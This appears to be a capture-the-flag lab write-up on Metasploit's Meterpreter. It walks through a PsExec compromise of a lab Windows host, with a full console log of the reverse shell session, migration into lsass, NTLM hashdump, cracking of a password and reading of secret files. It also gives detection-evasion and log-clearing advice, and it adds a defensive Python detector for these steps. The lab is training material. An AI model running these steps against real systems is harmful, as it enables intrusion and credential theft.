Introduction
Meterpreter is Metasploit's powerful payload: an "agent" that provides the operations needed after a compromise (post-exploitation). It does not reside on disk but runs in RAM, and its traffic to the C2 (the attacker side) is encrypted, so it is hard to detect. "Flavors" are available for many OSes and runtimes, and its built-in commands and extension modules (e.g. kiwi, python) make reconnaissance, privilege escalation and lateral movement efficient.
1. How Meterpreter works
- Memory residency: the binary (e.g. meterpreter.exe) is not dropped to disk; it runs in RAM. This tends to evade the "new file scan" that many AV products rely on.
- Encrypted communication: a TLS-encrypted channel is established by default. Unless the organization performs TLS decryption and inspection, detection by a NIDS/NIPS becomes difficult.
- Process migration (migrate): inject into another process to optimize stability, privileges, keystroke capture and so on. Example: migrate into lsass.exe in preparation for SAM/LSA extraction.
Example: even when you check the current PID with getpid, the session appears as a legitimate process such as spoolsv.exe.
meterpreter > getpid
Current pid: 1304
meterpreter > ps
... 1304 spoolsv.exe ...
2. Flavors (types) and delivery forms
- Delivery forms
  - Staged: a small "stager" is delivered first and then fetches the payload body, keeping the initial payload small.
  - Inline / Stageless: delivered in one step and executed as is.
- Supported platforms (examples)
  - Android / iOS / Windows / Linux / macOS / PHP / Python / Java, and others
  - Listing them (excerpt):
    msfvenom --list payloads | grep meterpreter
    android/meterpreter/reverse_https
    windows/x64/meterpreter/reverse_tcp
    linux/x64/meterpreter_reverse_http
    ...
- Exploit-side defaults
  Each module picks a default Meterpreter (e.g. ms17_010_eternalblue defaults to windows/x64/meterpreter/reverse_tcp).
3. Quick reference of key commands
Core
- background / sessions: session management
- migrate <PID>: process migration
- load <ext>: load an extension (e.g. load kiwi, load python)
- run / post: run Post modules
- sysinfo / getuid / getpid: check the environment and privileges
Files, network, system
- ls / cd / cat / upload / download
- ifconfig / netstat / portfwd / route
- ps / kill / shell / reg / clearev
Information gathering and manipulation
- search -f <pattern>: file search
- hashdump: extract NTLM hashes from the SAM (requires privileges)
- keyscan_start / keyscan_stop / keyscan_dump: keylogging
- screenshot / screenshare / webcam_* / record_mic
- getsystem: attempt privilege escalation
- timestomp: alter MACE timestamps
Not every command is always available (no webcam, insufficient privileges, virtual environment, etc.). Check which commands can actually be run with help each time.
4. Hands-on: intrusion via PSExec through post-exploitation
4.1 Initial access (authenticated RCE)
Assumed TryHackMe environment and credentials: exploit/windows/smb/psexec, SMBUser: ballen, SMBPass: Password1
msf6 > use exploit/windows/smb/psexec
msf6 exploit(psexec) > set RHOSTS 10.201.104.171
msf6 exploit(psexec) > set SMBUser ballen
msf6 exploit(psexec) > set SMBPass Password1
msf6 exploit(psexec) > run
[*] Meterpreter session 1 opened
Check host information with sysinfo:
meterpreter > sysinfo
Computer : ACME-TEST
OS : Windows Server 2019 (10.0 Build 17763)
Domain : FLASH
Q1: Computer name? → ACME-TEST
Q2: Target domain? → FLASH
4.2 Enumerating shares (Post module)
Return to the main console and run the Post module:
msf6 > use post/windows/gather/enum_shares
msf6 post(enum_shares) > set session 1
msf6 post(enum_shares) > run
[*] Name: SYSVOL ...
[*] Name: NETLOGON ...
[*] Name: speedster Path: C:\Shares\speedster
Q3: Share name that looks user-created? → speedster
4.3 Process migration and hash extraction
After migrating into lsass.exe, run hashdump (find the PID with ps):
meterpreter > migrate <PID_of_lsass>
meterpreter > hashdump
...
jchambers:1114:...:69596c7aa1e8daee17f8e78870e25a5c:::
Q4: jchambers' NTLM hash? → 69596c7aa1e8daee17f8e78870e25a5c
Look the hash up in an online dictionary (e.g. crackstation):
Q5: jchambers' plaintext password? → Trustno1
4.4 File search and confirming secrets
Searching for flags, credentials, hints and the like:
meterpreter > search -f secrets.txt
c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt
meterpreter > cat "...\secrets.txt"
My Twitter password is KDSvbsw3849!
meterpreter > search -f realsecret.txt
c:\inetpub\wwwroot\realsecret.txt
meterpreter > cat "...\realsecret.txt"
The Flash is the fastest man alive
4.5 Cleanup
- clearev to delete event logs (consider whether it is appropriate to apply)
- sessions -K and similar to tidy up and close sessions
5. Extensions: adding capabilities with load
- Python extension
  meterpreter > load python
  meterpreter > python_execute "print 'TryHackMe Rocks!'"
- Kiwi (Mimikatz)
  meterpreter > load kiwi
  meterpreter > creds_all
  meterpreter > dcsync_ntlm ...
After loading, the extension's command groups appear in help.
6. Operational notes (OPSEC / practical best practices)
- Legality: using this in an environment without permission is illegal. Always operate within the scope of written authorization.
- Stability: migrate directly affects session survival. Choose services that updates are unlikely to restart (e.g. spoolsv.exe), while watching for a drop in privileges.
- EDR evasion: memory monitoring and behavioral detection are now common. Minimize behaviour, load order, migration targets and I/O patterns.
- Logging: overuse of clearev can itself become a telltale trace. Act carefully, in line with the requirements and the agreement.
- Lateral movement: PtH with the extracted NTLM hashes, pivoting with portfwd/route, and AD information gathering (post/windows/gather/*, kiwi dcsync), step by step.
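An added example (not from the original write-up) that takes the defender's side of sections 1 and 6: a Python detector over constructed Windows telemetry that surfaces the migrate into lsass.exe (Sysmon Event ID 8 CreateRemoteThread and Event ID 10 ProcessAccess), the lsass read that hashdump needs, and the Security Event ID 1102 that a cleared audit log (clearev) leaves behind. The field names follow Sysmon's schema; the events and the ExampleEDR allowlist path are constructed.

```python
# Process access rights from the Win32 API (documented constants)
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_WRITE  # rights a migrate needs on its target
READ_MASK = PROCESS_VM_READ                             # rights a credential dump needs on lsass

# Constructed allowlist: tools expected to open lsass on this estate (hypothetical path)
LSASS_READERS_ALLOW = {r"c:\program files\exampleedr\agent.exe"}

# Constructed events mirroring this page's lab: the x86 PowerShell launched by PsExec hosts
# Meterpreter, migrates into lsass.exe, reads it for hashdump, and the audit log is cleared.
POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
LSASS = r"C:\Windows\System32\lsass.exe"
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Program Files\ExampleEDR\agent.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1010"},               # allowlisted reader
    {"EventID": 8, "SourceImage": POWERSHELL, "TargetImage": LSASS},  # CreateRemoteThread
    {"EventID": 10, "SourceImage": POWERSHELL, "TargetImage": LSASS,
     "GrantedAccess": "0x1fffff"},                                    # PROCESS_ALL_ACCESS
    {"EventID": 1102, "SubjectUserName": "ballen"},                   # audit log cleared
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\spoolsv.exe", "GrantedAccess": "0x1000"},  # benign
]


def detect(events, allow=LSASS_READERS_ALLOW):
    """Return (rule, detail) tuples for events consistent with migrate, hashdump and clearev."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        src = ev.get("SourceImage", "").lower()
        tgt = ev.get("TargetImage", "").lower()
        if eid == 8:
            # A thread started inside another process is the classic injection signature
            findings.append(("remote_thread", f"{src} -> {tgt}"))
        elif eid == 10:
            access = int(ev.get("GrantedAccess", "0x0"), 16)
            if src in allow:
                continue
            if (access & INJECT_MASK) == INJECT_MASK:
                findings.append(("inject_access", f"{src} -> {tgt} ({access:#x})"))
            if tgt.endswith("\\lsass.exe") and (access & READ_MASK):
                findings.append(("lsass_read", f"{src} ({access:#x})"))
        elif eid == 1102:
            # Clearing the Security log is itself logged; this is the trace clearev leaves
            findings.append(("log_cleared", ev.get("SubjectUserName", "?")))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```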
Summary
- Meterpreter is a post-exploitation platform whose RAM residency and TLS traffic give it evasion properties.
- Choose between Staged / Stageless and the multi-OS flavors according to exploit-side compatibility and communication requirements.
- Master the basic flow: help → learn the available commands → migrate → hashdump / search / screenshot / portfwd.
- Extend with load kiwi / load python to cover AD, credentials and automation.
- In the hands-on exercise we walked through: share enumeration (speedster) → migration into lsass → extraction of jchambers' NTLM hash (69596c7aa1e8daee17f8e78870e25a5c) → plaintext recovery (Trustno1) → confirming the secret files.
Log
msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(windows/smb/psexec) > info
Name: Microsoft Windows Authenticated User Code Execution
Module: exploit/windows/smb/psexec
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 1999-01-01
Provided by:
hdm <x@hdm.io>
Royce Davis <rdavis@accuvant.com>
RageLtMan <rageltman@sempervictus>
Available targets:
Id Name
-- ----
=> 0 Automatic
1 PowerShell
2 Native upload
3 MOF upload
4 Command
Check supported:
No
Basic options:
  Name                  Current Setting  Required  Description
  ----                  ---------------  --------  -----------
  SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
  SERVICE_DISPLAY_NAME                   no        The service display name
  SERVICE_NAME                           no        The service name
  SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share

Used when connecting via an existing SESSION:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   no        The session to run this module on

Used when making a new connection via RHOSTS:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  RHOSTS                      no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      445              no        The target port (TCP)
  SMBDomain  .                no        The Windows domain to use for authentication
  SMBPass                     no        The password for the specified username
  SMBUser                     no        The username to authenticate as
Payload information:
Space: 3072
Description:
This module uses a valid administrator username and password (or
password hash) to execute an arbitrary payload. This module is similar
to the "psexec" utility provided by SysInternals. This module is now able
to clean up after itself. The service created by this tool uses a randomly
chosen name and description.
References:
https://nvd.nist.gov/vuln/detail/CVE-1999-0504
OSVDB (3106)
http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
https://www.optiv.com/blog/owning-computers-without-shell-access
http://sourceforge.net/projects/smbexec/
View the full module info with the info -d command.
msf6 exploit(windows/smb/psexec) >
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.201.104.171
RHOSTS => 10.201.104.171
msf6 exploit(windows/smb/psexec) > set SMBUser ballen
SMBUser => ballen
msf6 exploit(windows/smb/psexec) > set SMBPass Password1
SMBPass => Password1
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.201.53.176:4444
[*] 10.201.104.171:445 - Connecting to the server...
[*] 10.201.104.171:445 - Authenticating to 10.201.104.171:445 as user 'ballen'...
[*] 10.201.104.171:445 - Selecting PowerShell target
[*] 10.201.104.171:445 - Executing the payload...
[+] 10.201.104.171:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 1 opened (10.201.53.176:4444 -> 10.201.104.171:52202) at 2025-11-01 13:20:46 +0000
meterpreter > sysinfo
Computer : ACME-TEST
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : FLASH
Logged On Users : 7
Meterpreter : x86/windows
meterpreter >
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    ssl_verify                Modify the SSL certificate verification setting
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory (alias for lpwd)
    getwd         Print working directory
    lcat          Read the contents of a local file to the screen
    lcd           Change local working directory
    ldir          List local files (alias for lls)
    lls           List local files
    lmkdir        Create new directory on local machine
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyboard_send  Send keystrokes
    keyevent       Send key events
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    mouse          Send mouse events
    screenshare    Watch the remote user desktop in real time
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands
=============================

    Command  Description
    -------  -----------
    play     play a waveform audio file (.wav) on the target system

Priv: Elevate Commands
======================

    Command    Description
    -------    -----------
    getsystem  Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

    Command   Description
    -------   -----------
    hashdump  Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

    Command    Description
    -------    -----------
    timestomp  Manipulate file MACE attributes
msf6 exploit(windows/smb/psexec) > use post/windows/gather/enum_shares
msf6 post(windows/gather/enum_shares) >
msf6 post(windows/gather/enum_shares) > set session 1
session => 1
msf6 post(windows/gather/enum_shares) > run
[*] Running module against ACME-TEST (10.201.104.171)
[*] The following shares were found:
[*] Name: SYSVOL
[*] Path: C:\Windows\SYSVOL\sysvol
[*] Remark: Logon server share
[*] Type: DISK
[*]
[*] Name: NETLOGON
[*] Path: C:\Windows\SYSVOL\sysvol\FLASH.local\SCRIPTS
[*] Remark: Logon server share
[*] Type: DISK
[*]
[*] Name: speedster
[*] Path: C:\Shares\speedster
[*] Type: DISK
[*]
[*] Post module execution completed
msf6 post(windows/gather/enum_shares) > back
msf6 > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ps

Process List
============

 PID   PPID  Name                                       Arch  Session  User                          Path
 ---   ----  ----                                       ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                                     x64   0
 68    4     Registry                                   x64   0
 396   4     smss.exe                                   x64   0
 548   540   csrss.exe                                  x64   0
 616   752   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 620   612   csrss.exe                                  x64   1
 672   540   wininit.exe                                x64   0
 704   612   winlogon.exe                               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 752   672   services.exe                               x64   0
 772   672   lsass.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 796   3772  powershell.exe                             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
 812   752   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 832   752   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 952   752   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 964   752   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 988   752   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1028  752   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1048  704   dwm.exe                                    x64   1        Window Manager\DWM-1          C:\Windows\System32\dwm.exe
 1076  752   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1136  752   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1328  752   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1504  752   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1552  752   msdtc.exe                                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 1652  752   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1736  752   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2060  704   fontdrvhost.exe                            x64   1        Font Driver Host\UMFD-1       C:\Windows\System32\fontdrvhost.exe
 2068  672   fontdrvhost.exe                            x64   0        Font Driver Host\UMFD-0       C:\Windows\System32\fontdrvhost.exe
 2076  752   spoolsv.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 2148  752   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2168  752   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2232  752   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2292  752   Microsoft.ActiveDirectory.WebServices.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
 2312  752   ismserv.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\ismserv.exe
 2340  752   dfsrs.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfsrs.exe
 2352  752   LiteAgent.exe                              x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\XenTools\LiteAgent.exe
 2380  752   dfssvc.exe                                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfssvc.exe
 2404  752   dns.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dns.exe
 2736  752   vds.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 2884  952   WmiPrvSE.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WmiPrvSE.exe
 3036  704   LogonUI.exe                                x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 3144  796   conhost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.ex
meterpreter > migrate 772
[*] Migrating from 2740 to 772...
[*] Migration completed successfully.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:0a8053ea4b9545d74a9b4e723f2a2a5f:::
meterpreter >
# use https://crackstation.net/
# 69596c7aa1e8daee17f8e78870e25a5c NTLM Trustno1
meterpreter > search -f secrets.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt 35 2021-07-30 08:44:27 +0100
meterpreter > cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"
My Twitter password is KDSvbsw3849!
meterpreter > search -f realsecret.txt
c:\inetpub\wwwroot\realsecret.txt
meterpreter > cat "c:\inetpub\wwwroot\realsecret.txt "
The Flash is the fastest man alive
msf6 exploit(windows/smb/psexec) > sessions -K -S "session_type:meterpreter"
[*] Killing matching sessions...
Active sessions
===============

  Id  Name  Type                     Information                      Connection
  --  ----  ----                     -----------                      ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ ACME-TEST  10.201.53.176:4444 -> 10.201.104.171:52202 (10.201.104.171)
[*] 10.201.104.171 - Meterpreter session 1 closed.
msf6 exploit(windows/smb/psexec) >